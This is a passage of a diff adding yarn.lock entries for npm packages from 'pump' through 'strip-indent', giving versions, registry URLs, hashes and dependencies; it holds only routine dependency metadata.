+  resolved "https://registry.yarnpkg.com/pump/-/pump-2.0.1.tgz#12399add6e4cf7526d973cbc8b5ce2e2908b3909"
+  dependencies:
+    end-of-stream "^1.1.0"
+    once "^1.3.1"
+
+pumpify@^1.3.3:
+  version "1.5.1"
+  resolved "https://registry.yarnpkg.com/pumpify/-/pumpify-1.5.1.tgz#36513be246ab27570b1a374a5ce278bfd74370ce"
+  dependencies:
+    duplexify "^3.6.0"
+    inherits "^2.0.3"
+    pump "^2.0.0"
+
+punycode@1.3.2:
+  version "1.3.2"
+  resolved "https://registry.yarnpkg.com/punycode/-/punycode-1.3.2.tgz#9653a036fb7c1ee42342f2325cceefea3926c48d"
+
+punycode@2.x.x, punycode@^2.1.0:
+  version "2.1.1"
+  resolved "https://registry.yarnpkg.com/punycode/-/punycode-2.1.1.tgz#b58b010ac40c22c5657616c8d2c2c02c7bf479ec"
+
+punycode@^1.2.4:
+  version "1.4.1"
+  resolved "https://registry.yarnpkg.com/punycode/-/punycode-1.4.1.tgz#c0d5a63b2718800ad8e1eb0fa5269c84dd41845e"
+
+q@^1.1.2:
+  version "1.5.1"
+  resolved "https://registry.yarnpkg.com/q/-/q-1.5.1.tgz#7e32f75b41381291d04611f1bf14109ac00651d7"
+
+query-string@^4.1.0:
+  version "4.3.4"
+  resolved "https://registry.yarnpkg.com/query-string/-/query-string-4.3.4.tgz#bbb693b9ca915c232515b228b1a02b609043dbeb"
+  dependencies:
+    object-assign "^4.1.0"
+    strict-uri-encode "^1.0.0"
+
+querystring-es3@^0.2.0, querystring-es3@^0.2.1:
+  version "0.2.1"
+  resolved "https://registry.yarnpkg.com/querystring-es3/-/querystring-es3-0.2.1.tgz#9ec61f79049875707d69414596fd907a4d711e73"
+
+querystring@0.2.0:
+  version "0.2.0"
+  resolved "https://registry.yarnpkg.com/querystring/-/querystring-0.2.0.tgz#b209849203bb25df820da756e747005878521620"
+
+quick-lru@^1.0.0:
+  version "1.1.0"
+  resolved "https://registry.yarnpkg.com/quick-lru/-/quick-lru-1.1.0.tgz#4360b17c61136ad38078397ff11416e186dcfbb8"
+
+randomatic@^3.0.0:
+  version "3.0.0"
+  resolved "https://registry.yarnpkg.com/randomatic/-/randomatic-3.0.0.tgz#d35490030eb4f7578de292ce6dfb04a91a128923"
+  dependencies:
+    is-number "^4.0.0"
+    kind-of "^6.0.0"
+    math-random "^1.0.1"
+
+randombytes@^2.0.0, randombytes@^2.0.1, randombytes@^2.0.5:
+  version "2.0.6"
+  resolved "https://registry.yarnpkg.com/randombytes/-/randombytes-2.0.6.tgz#d302c522948588848a8d300c932b44c24231da80"
+  dependencies:
+    safe-buffer "^5.1.0"
+
+randomfill@^1.0.3:
+  version "1.0.4"
+  resolved "https://registry.yarnpkg.com/randomfill/-/randomfill-1.0.4.tgz#c92196fc86ab42be983f1bf31778224931d61458"
+  dependencies:
+    randombytes "^2.0.5"
+    safe-buffer "^5.1.0"
+
+range-parser@^1.0.3:
+  version "1.2.0"
+  resolved "https://registry.yarnpkg.com/range-parser/-/range-parser-1.2.0.tgz#f49be6b487894ddc40dcc94a322f611092e00d5e"
+
+rc@^1.0.1, rc@^1.1.6, rc@^1.1.7:
+  version "1.2.8"
+  resolved "https://registry.yarnpkg.com/rc/-/rc-1.2.8.tgz#cd924bf5200a075b83c188cd6b9e211b7fc0d3ed"
+  dependencies:
+    deep-extend "^0.6.0"
+    ini "~1.3.0"
+    minimist "^1.2.0"
+    strip-json-comments "~2.0.1"
+
+read-pkg-up@^3.0.0:
+  version "3.0.0"
+  resolved "https://registry.yarnpkg.com/read-pkg-up/-/read-pkg-up-3.0.0.tgz#3ed496685dba0f8fe118d0691dc51f4a1ff96f07"
+  dependencies:
+    find-up "^2.0.0"
+    read-pkg "^3.0.0"
+
+read-pkg@^3.0.0:
+  version "3.0.0"
+  resolved "https://registry.yarnpkg.com/read-pkg/-/read-pkg-3.0.0.tgz#9cbc686978fee65d16c00e2b19c237fcf6e38389"
+  dependencies:
+    load-json-file "^4.0.0"
+    normalize-package-data "^2.3.2"
+    path-type "^3.0.0"
+
+"readable-stream@1 || 2", readable-stream@^2.0.0, readable-stream@^2.0.1, readable-stream@^2.0.2, readable-stream@^2.0.4, readable-stream@^2.0.6, readable-stream@^2.1.5, readable-stream@^2.2.2, readable-stream@^2.3.3, readable-stream@^2.3.6:
+  version "2.3.6"
+  resolved "https://registry.yarnpkg.com/readable-stream/-/readable-stream-2.3.6.tgz#b11c27d88b8ff1fbe070643cf94b0c79ae1b0aaf"
+  dependencies:
+    core-util-is "~1.0.0"
+    inherits "~2.0.3"
+    isarray "~1.0.0"
+    process-nextick-args "~2.0.0"
+    safe-buffer "~5.1.1"
+    string_decoder "~1.1.1"
+    util-deprecate "~1.0.1"
+
+readable-stream@1.0:
+  version "1.0.34"
+  resolved "https://registry.yarnpkg.com/readable-stream/-/readable-stream-1.0.34.tgz#125820e34bc842d2f2aaafafe4c2916ee32c157c"
+  dependencies:
+    core-util-is "~1.0.0"
+    inherits "~2.0.1"
+    isarray "0.0.1"
+    string_decoder "~0.10.x"
+
+readdirp@^2.0.0:
+  version "2.1.0"
+  resolved "https://registry.yarnpkg.com/readdirp/-/readdirp-2.1.0.tgz#4ed0ad060df3073300c48440373f72d1cc642d78"
+  dependencies:
+    graceful-fs "^4.1.2"
+    minimatch "^3.0.2"
+    readable-stream "^2.0.2"
+    set-immediate-shim "^1.0.1"
+
+redent@^2.0.0:
+  version "2.0.0"
+  resolved "https://registry.yarnpkg.com/redent/-/redent-2.0.0.tgz#c1b2007b42d57eb1389079b3c8333639d5e1ccaa"
+  dependencies:
+    indent-string "^3.0.0"
+    strip-indent "^2.0.0"
+
+reduce-css-calc@^1.2.6:
+  version "1.3.0"
+  resolved "https://registry.yarnpkg.com/reduce-css-calc/-/reduce-css-calc-1.3.0.tgz#747c914e049614a4c9cfbba629871ad1d2927716"
+  dependencies:
+    balanced-match "^0.4.2"
+    math-expression-evaluator "^1.2.14"
+    reduce-function-call "^1.0.1"
+
+reduce-function-call@^1.0.1:
+  version "1.0.2"
+  resolved "https://registry.yarnpkg.com/reduce-function-call/-/reduce-function-call-1.0.2.tgz#5a200bf92e0e37751752fe45b0ab330fd4b6be99"
+  dependencies:
+    balanced-match "^0.4.2"
+
+reduce@^1.0.1:
+  version "1.0.1"
+  resolved "https://registry.yarnpkg.com/reduce/-/reduce-1.0.1.tgz#14fa2e5ff1fc560703a020cbb5fbaab691565804"
+  dependencies:
+    object-keys "~1.0.0"
+
+regenerate-unicode-properties@^7.0.0:
+  version "7.0.0"
+  resolved "https://registry.yarnpkg.com/regenerate-unicode-properties/-/regenerate-unicode-properties-7.0.0.tgz#107405afcc4a190ec5ed450ecaa00ed0cafa7a4c"
+  dependencies:
+    regenerate "^1.4.0"
+
+regenerate@^1.2.1, regenerate@^1.4.0:
+  version "1.4.0"
+  resolved "https://registry.yarnpkg.com/regenerate/-/regenerate-1.4.0.tgz#4a856ec4b56e4077c557589cae85e7a4c8869a11"
+
+regenerator-runtime@^0.11.0, regenerator-runtime@^0.11.1:
+  version "0.11.1"
+  resolved "https://registry.yarnpkg.com/regenerator-runtime/-/regenerator-runtime-0.11.1.tgz#be05ad7f9bf7d22e056f9726cee5017fbf19e2e9"
+
+regenerator-transform@^0.12.3:
+  version "0.12.4"
+  resolved "https://registry.yarnpkg.com/regenerator-transform/-/regenerator-transform-0.12.4.tgz#aa9b6c59f4b97be080e972506c560b3bccbfcff0"
+  dependencies:
+    private "^0.1.6"
+
+regex-cache@^0.4.2:
+  version "0.4.4"
+  resolved "https://registry.yarnpkg.com/regex-cache/-/regex-cache-0.4.4.tgz#75bdc58a2a1496cec48a12835bc54c8d562336dd"
+  dependencies:
+    is-equal-shallow "^0.1.3"
+
+regex-not@^1.0.0, regex-not@^1.0.2:
+  version "1.0.2"
+  resolved "https://registry.yarnpkg.com/regex-not/-/regex-not-1.0.2.tgz#1f4ece27e00b0b65e0247a6810e6a85d83a5752c"
+  dependencies:
+    extend-shallow "^3.0.2"
+    safe-regex "^1.1.0"
+
+regexpu-core@^1.0.0:
+  version "1.0.0"
+  resolved "https://registry.yarnpkg.com/regexpu-core/-/regexpu-core-1.0.0.tgz#86a763f58ee4d7c2f6b102e4764050de7ed90c6b"
+  dependencies:
+    regenerate "^1.2.1"
+    regjsgen "^0.2.0"
+    regjsparser "^0.1.4"
+
+regexpu-core@^4.1.3, regexpu-core@^4.1.4:
+  version "4.2.0"
+  resolved "https://registry.yarnpkg.com/regexpu-core/-/regexpu-core-4.2.0.tgz#a3744fa03806cffe146dea4421a3e73bdcc47b1d"
+  dependencies:
+    regenerate "^1.4.0"
+    regenerate-unicode-properties "^7.0.0"
+    regjsgen "^0.4.0"
+    regjsparser "^0.3.0"
+    unicode-match-property-ecmascript "^1.0.4"
+    unicode-match-property-value-ecmascript "^1.0.2"
+
+register-service-worker@^1.2.0:
+  version "1.4.1"
+  resolved "https://registry.yarnpkg.com/register-service-worker/-/register-service-worker-1.4.1.tgz#4b4c9b4200fc697942c6ae7d611349587b992b2f"
+
+registry-auth-token@^3.0.1:
+  version "3.3.2"
+  resolved "https://registry.yarnpkg.com/registry-auth-token/-/registry-auth-token-3.3.2.tgz#851fd49038eecb586911115af845260eec983f20"
+  dependencies:
+    rc "^1.1.6"
+    safe-buffer "^5.0.1"
+
+registry-url@^3.0.3:
+  version "3.1.0"
+  resolved "https://registry.yarnpkg.com/registry-url/-/registry-url-3.1.0.tgz#3d4ef870f73dde1d77f0cf9a381432444e174942"
+  dependencies:
+    rc "^1.0.1"
+
+regjsgen@^0.2.0:
+  version "0.2.0"
+  resolved "https://registry.yarnpkg.com/regjsgen/-/regjsgen-0.2.0.tgz#6c016adeac554f75823fe37ac05b92d5a4edb1f7"
+
+regjsgen@^0.4.0:
+  version "0.4.0"
+  resolved "https://registry.yarnpkg.com/regjsgen/-/regjsgen-0.4.0.tgz#c1eb4c89a209263f8717c782591523913ede2561"
+
+regjsparser@^0.1.4:
+  version "0.1.5"
+  resolved "https://registry.yarnpkg.com/regjsparser/-/regjsparser-0.1.5.tgz#7ee8f84dc6fa792d3fd0ae228d24bd949ead205c"
+  dependencies:
+    jsesc "~0.5.0"
+
+regjsparser@^0.3.0:
+  version "0.3.0"
+  resolved "https://registry.yarnpkg.com/regjsparser/-/regjsparser-0.3.0.tgz#3c326da7fcfd69fa0d332575a41c8c0cdf588c96"
+  dependencies:
+    jsesc "~0.5.0"
+
+relateurl@0.2.x:
+  version "0.2.7"
+  resolved "https://registry.yarnpkg.com/relateurl/-/relateurl-0.2.7.tgz#54dbf377e51440aca90a4cd274600d3ff2d888a9"
+
+remove-array-items@^1.0.0:
+  version "1.0.0"
+  resolved "https://registry.yarnpkg.com/remove-array-items/-/remove-array-items-1.0.0.tgz#07bf42cb332f4cf6e85ead83b5e4e896d2326b21"
+
+remove-trailing-separator@^1.0.1:
+  version "1.1.0"
+  resolved "https://registry.yarnpkg.com/remove-trailing-separator/-/remove-trailing-separator-1.1.0.tgz#c24bce2a283adad5bc3f58e0d48249b92379d8ef"
+
+renderkid@^2.0.1:
+  version "2.0.1"
+  resolved "https://registry.yarnpkg.com/renderkid/-/renderkid-2.0.1.tgz#898cabfc8bede4b7b91135a3ffd323e58c0db319"
+  dependencies:
+    css-select "^1.1.0"
+    dom-converter "~0.1"
+    htmlparser2 "~3.3.0"
+    strip-ansi "^3.0.0"
+    utila "~0.3"
+
+repeat-element@^1.1.2:
+  version "1.1.2"
+  resolved "https://registry.yarnpkg.com/repeat-element/-/repeat-element-1.1.2.tgz#ef089a178d1483baae4d93eb98b4f9e4e11d990a"
+
+repeat-string@^1.5.2, repeat-string@^1.6.1:
+  version "1.6.1"
+  resolved "https://registry.yarnpkg.com/repeat-string/-/repeat-string-1.6.1.tgz#8dcae470e1c88abc2d600fff4a776286da75e637"
+
+require-from-string@^1.1.0:
+  version "1.2.1"
+  resolved "https://registry.yarnpkg.com/require-from-string/-/require-from-string-1.2.1.tgz#529c9ccef27380adfec9a2f965b649bbee636418"
+
+resolve-cwd@^2.0.0:
+  version "2.0.0"
+  resolved "https://registry.yarnpkg.com/resolve-cwd/-/resolve-cwd-2.0.0.tgz#00a9f7387556e27038eae232caa372a6a59b665a"
+  dependencies:
+    resolve-from "^3.0.0"
+
+resolve-from@^3.0.0:
+  version "3.0.0"
+  resolved "https://registry.yarnpkg.com/resolve-from/-/resolve-from-3.0.0.tgz#b22c7af7d9d6881bc8b6e653335eebcb0a188748"
+
+resolve-path@^1.3.3, resolve-path@^1.4.0:
+  version "1.4.0"
+  resolved "https://registry.yarnpkg.com/resolve-path/-/resolve-path-1.4.0.tgz#c4bda9f5efb2fce65247873ab36bb4d834fe16f7"
+  dependencies:
+    http-errors "~1.6.2"
+    path-is-absolute "1.0.1"
+
+resolve-url@^0.2.1:
+  version "0.2.1"
+  resolved "https://registry.yarnpkg.com/resolve-url/-/resolve-url-0.2.1.tgz#2c637fe77c893afd2a663fe21aa9080068e2052a"
+
+resolve@^1.2.0, resolve@^1.3.2, resolve@^1.6.0:
+  version "1.8.1"
+  resolved "https://registry.yarnpkg.com/resolve/-/resolve-1.8.1.tgz#82f1ec19a423ac1fbd080b0bab06ba36e84a7a26"
+  dependencies:
+    path-parse "^1.0.5"
+
+restore-cursor@^2.0.0:
+  version "2.0.0"
+  resolved "https://registry.yarnpkg.com/restore-cursor/-/restore-cursor-2.0.0.tgz#9f7ee287f82fd326d4fd162923d62129eee0dfaf"
+  dependencies:
+    onetime "^2.0.0"
+    signal-exit "^3.0.2"
+
+ret@~0.1.10:
+  version "0.1.15"
+  resolved "https://registry.yarnpkg.com/ret/-/ret-0.1.15.tgz#b8a4825d5bdb1fc3f6f53c2bc33f81388681c7bc"
+
+rimraf@^2.5.4, rimraf@^2.6.1, rimraf@^2.6.2:
+  version "2.6.2"
+  resolved "https://registry.yarnpkg.com/rimraf/-/rimraf-2.6.2.tgz#2ed8150d24a16ea8651e6d6ef0f47c4158ce7a36"
+  dependencies:
+    glob "^7.0.5"
+
+ripemd160@^2.0.0, ripemd160@^2.0.1:
+  version "2.0.2"
+  resolved "https://registry.yarnpkg.com/ripemd160/-/ripemd160-2.0.2.tgz#a1c1a6f624751577ba5d07914cbc92850585890c"
+  dependencies:
+    hash-base "^3.0.0"
+    inherits "^2.0.1"
+
+run-queue@^1.0.0, run-queue@^1.0.3:
+  version "1.0.3"
+  resolved "https://registry.yarnpkg.com/run-queue/-/run-queue-1.0.3.tgz#e848396f057d223f24386924618e25694161ec47"
+  dependencies:
+    aproba "^1.1.1"
+
+safe-buffer@^5.0.1, safe-buffer@^5.1.0, safe-buffer@^5.1.1, safe-buffer@^5.1.2, safe-buffer@~5.1.0, safe-buffer@~5.1.1:
+  version "5.1.2"
+  resolved "https://registry.yarnpkg.com/safe-buffer/-/safe-buffer-5.1.2.tgz#991ec69d296e0313747d59bdfd2b745c35f8828d"
+
+safe-regex@^1.1.0:
+  version "1.1.0"
+  resolved "https://registry.yarnpkg.com/safe-regex/-/safe-regex-1.1.0.tgz#40a3669f3b077d1e943d44629e157dd48023bf2e"
+  dependencies:
+    ret "~0.1.10"
+
+"safer-buffer@>= 2.1.2 < 3":
+  version "2.1.2"
+  resolved "https://registry.yarnpkg.com/safer-buffer/-/safer-buffer-2.1.2.tgz#44fa161b0187b9549dd84bb91802f9bd8385cd6a"
+
+sax@0.5.x:
+  version "0.5.8"
+  resolved "https://registry.yarnpkg.com/sax/-/sax-0.5.8.tgz#d472db228eb331c2506b0e8c15524adb939d12c1"
+
+sax@^1.2.4, sax@~1.2.1:
+  version "1.2.4"
+  resolved "https://registry.yarnpkg.com/sax/-/sax-1.2.4.tgz#2816234e2378bddc4e5354fab5caa895df7100d9"
+
+schema-utils@^0.4.0, schema-utils@^0.4.2, schema-utils@^0.4.3, schema-utils@^0.4.4, schema-utils@^0.4.5:
+  version "0.4.5"
+  resolved "https://registry.yarnpkg.com/schema-utils/-/schema-utils-0.4.5.tgz#21836f0608aac17b78f9e3e24daff14a5ca13a3e"
+  dependencies:
+    ajv "^6.1.0"
+    ajv-keywords "^3.1.0"
+
+section-matter@^1.0.0:
+  version "1.0.0"
+  resolved "https://registry.yarnpkg.com/section-matter/-/section-matter-1.0.0.tgz#e9041953506780ec01d59f292a19c7b850b84167"
+  dependencies:
+    extend-shallow "^2.0.1"
+    kind-of "^6.0.0"
+
+select@^1.1.2:
+  version "1.1.2"
+  resolved "https://registry.yarnpkg.com/select/-/select-1.1.2.tgz#0e7350acdec80b1108528786ec1d4418d11b396d"
+
+semver-diff@^2.0.0:
+  version "2.1.0"
+  resolved "https://registry.yarnpkg.com/semver-diff/-/semver-diff-2.1.0.tgz#4bbb8437c8d37e4b0cf1a68fd726ec6d645d6d36"
+  dependencies:
+    semver "^5.0.3"
+
+"semver@2 || 3 || 4 || 5", semver@^5.0.3, semver@^5.1.0, semver@^5.3.0, semver@^5.4.1, semver@^5.5.0:
+  version "5.5.0"
+  resolved "https://registry.yarnpkg.com/semver/-/semver-5.5.0.tgz#dc4bbc7a6ca9d916dee5d43516f0092b58f7b8ab"
+
+serialize-javascript@^1.3.0, serialize-javascript@^1.4.0:
+  version "1.5.0"
+  resolved "https://registry.yarnpkg.com/serialize-javascript/-/serialize-javascript-1.5.0.tgz#1aa336162c88a890ddad5384baebc93a655161fe"
+
+set-blocking@~2.0.0:
+  version "2.0.0"
+  resolved "https://registry.yarnpkg.com/set-blocking/-/set-blocking-2.0.0.tgz#045f9782d011ae9a6803ddd382b24392b3d890f7"
+
+set-immediate-shim@^1.0.1:
+  version "1.0.1"
+  resolved "https://registry.yarnpkg.com/set-immediate-shim/-/set-immediate-shim-1.0.1.tgz#4b2b1b27eb808a9f8dcc481a58e5e56f599f3f61"
+
+set-value@^0.4.3:
+  version "0.4.3"
+  resolved "https://registry.yarnpkg.com/set-value/-/set-value-0.4.3.tgz#7db08f9d3d22dc7f78e53af3c3bf4666ecdfccf1"
+  dependencies:
+    extend-shallow "^2.0.1"
+    is-extendable "^0.1.1"
+    is-plain-object "^2.0.1"
+    to-object-path "^0.3.0"
+
+set-value@^2.0.0:
+  version "2.0.0"
+  resolved "https://registry.yarnpkg.com/set-value/-/set-value-2.0.0.tgz#71ae4a88f0feefbbf52d1ea604f3fb315ebb6274"
+  dependencies:
+    extend-shallow "^2.0.1"
+    is-extendable "^0.1.1"
+    is-plain-object "^2.0.3"
+    split-string "^3.0.1"
+
+setimmediate@^1.0.4:
+  version "1.0.5"
+  resolved "https://registry.yarnpkg.com/setimmediate/-/setimmediate-1.0.5.tgz#290cbb232e306942d7d7ea9b83732ab7856f8285"
+
+setprototypeof@1.1.0:
+  version "1.1.0"
+  resolved "https://registry.yarnpkg.com/setprototypeof/-/setprototypeof-1.1.0.tgz#d0bd85536887b6fe7c0d818cb962d9d91c54e656"
+
+sha.js@^2.4.0, sha.js@^2.4.8:
+  version "2.4.11"
+  resolved "https://registry.yarnpkg.com/sha.js/-/sha.js-2.4.11.tgz#37a5cf0b81ecbc6943de109ba2960d1b26584ae7"
+  dependencies:
+    inherits "^2.0.1"
+    safe-buffer "^5.0.1"
+
+shebang-command@^1.2.0:
+  version "1.2.0"
+  resolved "https://registry.yarnpkg.com/shebang-command/-/shebang-command-1.2.0.tgz#44aac65b695b03398968c39f363fee5deafdf1ea"
+  dependencies:
+    shebang-regex "^1.0.0"
+
+shebang-regex@^1.0.0:
+  version "1.0.0"
+  resolved "https://registry.yarnpkg.com/shebang-regex/-/shebang-regex-1.0.0.tgz#da42f49740c0b42db2ca9728571cb190c98efea3"
+
+signal-exit@^3.0.0, signal-exit@^3.0.2:
+  version "3.0.2"
+  resolved "https://registry.yarnpkg.com/signal-exit/-/signal-exit-3.0.2.tgz#b5fdc08f1287ea1178628e415e25132b73646c6d"
+
+slash@^1.0.0:
+  version "1.0.0"
+  resolved "https://registry.yarnpkg.com/slash/-/slash-1.0.0.tgz#c41f2f6c39fc16d1cd17ad4b5d896114ae470d55"
+
+slice-ansi@1.0.0:
+  version "1.0.0"
+  resolved "https://registry.yarnpkg.com/slice-ansi/-/slice-ansi-1.0.0.tgz#044f1a49d8842ff307aad6b505ed178bd950134d"
+  dependencies:
+    is-fullwidth-code-point "^2.0.0"
+
+snapdragon-node@^2.0.1:
+  version "2.1.1"
+  resolved "https://registry.yarnpkg.com/snapdragon-node/-/snapdragon-node-2.1.1.tgz#6c175f86ff14bdb0724563e8f3c1b021a286853b"
+  dependencies:
+    define-property "^1.0.0"
+    isobject "^3.0.0"
+    snapdragon-util "^3.0.1"
+
+snapdragon-util@^3.0.1:
+  version "3.0.1"
+  resolved "https://registry.yarnpkg.com/snapdragon-util/-/snapdragon-util-3.0.1.tgz#f956479486f2acd79700693f6f7b805e45ab56e2"
+  dependencies:
+    kind-of "^3.2.0"
+
+snapdragon@^0.8.1:
+  version "0.8.2"
+  resolved "https://registry.yarnpkg.com/snapdragon/-/snapdragon-0.8.2.tgz#64922e7c565b0e14204ba1aa7d6964278d25182d"
+  dependencies:
+    base "^0.11.1"
+    debug "^2.2.0"
+    define-property "^0.2.5"
+    extend-shallow "^2.0.1"
+    map-cache "^0.2.2"
+    source-map "^0.5.6"
+    source-map-resolve "^0.5.0"
+    use "^3.1.0"
+
+sort-keys@^1.0.0:
+  version "1.1.2"
+  resolved "https://registry.yarnpkg.com/sort-keys/-/sort-keys-1.1.2.tgz#441b6d4d346798f1b4e49e8920adfba0e543f9ad"
+  dependencies:
+    is-plain-obj "^1.0.0"
+
+source-list-map@^2.0.0:
+  version "2.0.0"
+  resolved "https://registry.yarnpkg.com/source-list-map/-/source-list-map-2.0.0.tgz#aaa47403f7b245a92fbc97ea08f250d6087ed085"
+
+source-map-resolve@^0.5.0:
+  version "0.5.2"
+  resolved "https://registry.yarnpkg.com/source-map-resolve/-/source-map-resolve-0.5.2.tgz#72e2cc34095543e43b2c62b2c4c10d4a9054f259"
+  dependencies:
+    atob "^2.1.1"
+    decode-uri-component "^0.2.0"
+    resolve-url "^0.2.1"
+    source-map-url "^0.4.0"
+    urix "^0.1.0"
+
+source-map-url@^0.4.0:
+  version "0.4.0"
+  resolved "https://registry.yarnpkg.com/source-map-url/-/source-map-url-0.4.0.tgz#3e935d7ddd73631b97659956d55128e87b5084a3"
+
+source-map@0.1.x:
+  version "0.1.43"
+  resolved "https://registry.yarnpkg.com/source-map/-/source-map-0.1.43.tgz#c24bc146ca517c1471f5dacbe2571b2b7f9e3346"
+  dependencies:
+    amdefine ">=0.0.4"
+
+source-map@0.5.6:
+  version "0.5.6"
+  resolved "https://registry.yarnpkg.com/source-map/-/source-map-0.5.6.tgz#75ce38f52bf0733c5a7f0c118d81334a2bb5f412"
+
+source-map@0.5.x, source-map@^0.5.0, source-map@^0.5.3, source-map@^0.5.6:
+  version "0.5.7"
+  resolved "https://registry.yarnpkg.com/source-map/-/source-map-0.5.7.tgz#8a039d2d1021d22d1ea14c80d8ea468ba2ef3fcc"
+
+source-map@^0.6.1, source-map@~0.6.1:
+  version "0.6.1"
+  resolved "https://registry.yarnpkg.com/source-map/-/source-map-0.6.1.tgz#74722af32e9614e9c287a8d0bbde48b5e2f1a263"
+
+spdx-correct@^3.0.0:
+  version "3.0.0"
+  resolved "https://registry.yarnpkg.com/spdx-correct/-/spdx-correct-3.0.0.tgz#05a5b4d7153a195bc92c3c425b69f3b2a9524c82"
+  dependencies:
+    spdx-expression-parse "^3.0.0"
+    spdx-license-ids "^3.0.0"
+
+spdx-exceptions@^2.1.0:
+  version "2.1.0"
+  resolved "https://registry.yarnpkg.com/spdx-exceptions/-/spdx-exceptions-2.1.0.tgz#2c7ae61056c714a5b9b9b2b2af7d311ef5c78fe9"
+
+spdx-expression-parse@^3.0.0:
+  version "3.0.0"
+  resolved "https://registry.yarnpkg.com/spdx-expression-parse/-/spdx-expression-parse-3.0.0.tgz#99e119b7a5da00e05491c9fa338b7904823b41d0"
+  dependencies:
+    spdx-exceptions "^2.1.0"
+    spdx-license-ids "^3.0.0"
+
+spdx-license-ids@^3.0.0:
+  version "3.0.0"
+  resolved "https://registry.yarnpkg.com/spdx-license-ids/-/spdx-license-ids-3.0.0.tgz#7a7cd28470cc6d3a1cfe6d66886f6bc430d3ac87"
+
+split-string@^3.0.1, split-string@^3.0.2:
+  version "3.1.0"
+  resolved "https://registry.yarnpkg.com/split-string/-/split-string-3.1.0.tgz#7cb09dda3a86585705c64b39a6466038682e8fe2"
+  dependencies:
+    extend-shallow "^3.0.0"
+
+sprintf-js@~1.0.2:
+  version "1.0.3"
+  resolved "https://registry.yarnpkg.com/sprintf-js/-/sprintf-js-1.0.3.tgz#04e6926f662895354f3dd015203633b857297e2c"
+
+ssri@^5.2.4:
+  version "5.3.0"
+  resolved "https://registry.yarnpkg.com/ssri/-/ssri-5.3.0.tgz#ba3872c9c6d33a0704a7d71ff045e5ec48999d06"
+  dependencies:
+    safe-buffer "^5.1.1"
+
+static-extend@^0.1.1:
+  version "0.1.2"
+  resolved "https://registry.yarnpkg.com/static-extend/-/static-extend-0.1.2.tgz#60809c39cbff55337226fd5e0b520f341f1fb5c6"
+  dependencies:
+    define-property "^0.2.5"
+    object-copy "^0.1.0"
+
+"statuses@>= 1.4.0 < 2", statuses@^1.2.0:
+  version "1.5.0"
+  resolved "https://registry.yarnpkg.com/statuses/-/statuses-1.5.0.tgz#161c7dac177659fd9811f43771fa99381478628c"
+
+std-env@^1.1.0, std-env@^1.3.0:
+  version "1.3.0"
+  resolved "https://registry.yarnpkg.com/std-env/-/std-env-1.3.0.tgz#8ce754a401a61f1ac49c8eb55f2a8c0c63d54954"
+  dependencies:
+    is-ci "^1.1.0"
+
+stream-browserify@^2.0.1:
+  version "2.0.1"
+  resolved "https://registry.yarnpkg.com/stream-browserify/-/stream-browserify-2.0.1.tgz#66266ee5f9bdb9940a4e4514cafb43bb71e5c9db"
+  dependencies:
+    inherits "~2.0.1"
+    readable-stream "^2.0.2"
+
+stream-each@^1.1.0:
+  version "1.2.2"
+  resolved "https://registry.yarnpkg.com/stream-each/-/stream-each-1.2.2.tgz#8e8c463f91da8991778765873fe4d960d8f616bd"
+  dependencies:
+    end-of-stream "^1.1.0"
+    stream-shift "^1.0.0"
+
+stream-http@^2.7.2:
+  version "2.8.3"
+  resolved "https://registry.yarnpkg.com/stream-http/-/stream-http-2.8.3.tgz#b2d242469288a5a27ec4fe8933acf623de6514fc"
+  dependencies:
+    builtin-status-codes "^3.0.0"
+    inherits "^2.0.1"
+    readable-stream "^2.3.6"
+    to-arraybuffer "^1.0.0"
+    xtend "^4.0.0"
+
+stream-shift@^1.0.0:
+  version "1.0.0"
+  resolved "https://registry.yarnpkg.com/stream-shift/-/stream-shift-1.0.0.tgz#d5c752825e5367e786f78e18e445ea223a155952"
+
+stream-slice@^0.1.2:
+  version "0.1.2"
+  resolved "https://registry.yarnpkg.com/stream-slice/-/stream-slice-0.1.2.tgz#2dc4f4e1b936fb13f3eb39a2def1932798d07a4b"
+
+strict-uri-encode@^1.0.0:
+  version "1.1.0"
+  resolved "https://registry.yarnpkg.com/strict-uri-encode/-/strict-uri-encode-1.1.0.tgz#279b225df1d582b1f54e65addd4352e18faa0713"
+
+string-width@^1.0.1:
+  version "1.0.2"
+  resolved "https://registry.yarnpkg.com/string-width/-/string-width-1.0.2.tgz#118bdf5b8cdc51a2a7e70d211e07e2b0b9b107d3"
+  dependencies:
+    code-point-at "^1.0.0"
+    is-fullwidth-code-point "^1.0.0"
+    strip-ansi "^3.0.0"
+
+"string-width@^1.0.2 || 2", string-width@^2.0.0, string-width@^2.1.1:
+  version "2.1.1"
+  resolved "https://registry.yarnpkg.com/string-width/-/string-width-2.1.1.tgz#ab93f27a8dc13d28cac815c462143a6d9012ae9e"
+  dependencies:
+    is-fullwidth-code-point "^2.0.0"
+    strip-ansi "^4.0.0"
+
+string@^3.3.3, string@~3.3.3:
+  version "3.3.3"
+  resolved "https://registry.yarnpkg.com/string/-/string-3.3.3.tgz#5ea211cd92d228e184294990a6cc97b366a77cb0"
+
+string_decoder@^1.0.0, string_decoder@~1.1.1:
+  version "1.1.1"
+  resolved "https://registry.yarnpkg.com/string_decoder/-/string_decoder-1.1.1.tgz#9cf1611ba62685d7030ae9e4ba34149c3af03fc8"
+  dependencies:
+    safe-buffer "~5.1.0"
+
+string_decoder@~0.10.x:
+  version "0.10.31"
+  resolved "https://registry.yarnpkg.com/string_decoder/-/string_decoder-0.10.31.tgz#62e203bc41766c6c28c9fc84301dab1c5310fa94"
+
+strip-ansi@^3.0.0, strip-ansi@^3.0.1:
+  version "3.0.1"
+  resolved "https://registry.yarnpkg.com/strip-ansi/-/strip-ansi-3.0.1.tgz#6a385fb8853d952d5ff05d0e8aaf94278dc63dcf"
+  dependencies:
+    ansi-regex "^2.0.0"
+
+strip-ansi@^4.0.0:
+  version "4.0.0"
+  resolved "https://registry.yarnpkg.com/strip-ansi/-/strip-ansi-4.0.0.tgz#a8479022eb1ac368a871389b635262c505ee368f"
+  dependencies:
+    ansi-regex "^3.0.0"
+
+strip-bom-string@^1.0.0:
+  version "1.0.0"
+  resolved "https://registry.yarnpkg.com/strip-bom-string/-/strip-bom-string-1.0.0.tgz#e5211e9224369fbb81d633a2f00044dc8cedad92"
+
+strip-bom@^3.0.0:
+  version "3.0.0"
+  resolved "https://registry.yarnpkg.com/strip-bom/-/strip-bom-3.0.0.tgz#2334c18e9c759f7bdd56fdef7e9ae3d588e68ed3"
+
+strip-eof@^1.0.0:
+  version "1.0.0"
+  resolved "https://registry.yarnpkg.com/strip-eof/-/strip-eof-1.0.0.tgz#bb43ff5598a6eb05d89b59fcd129c983313606bf"
+
+strip-indent@^2.0.0:
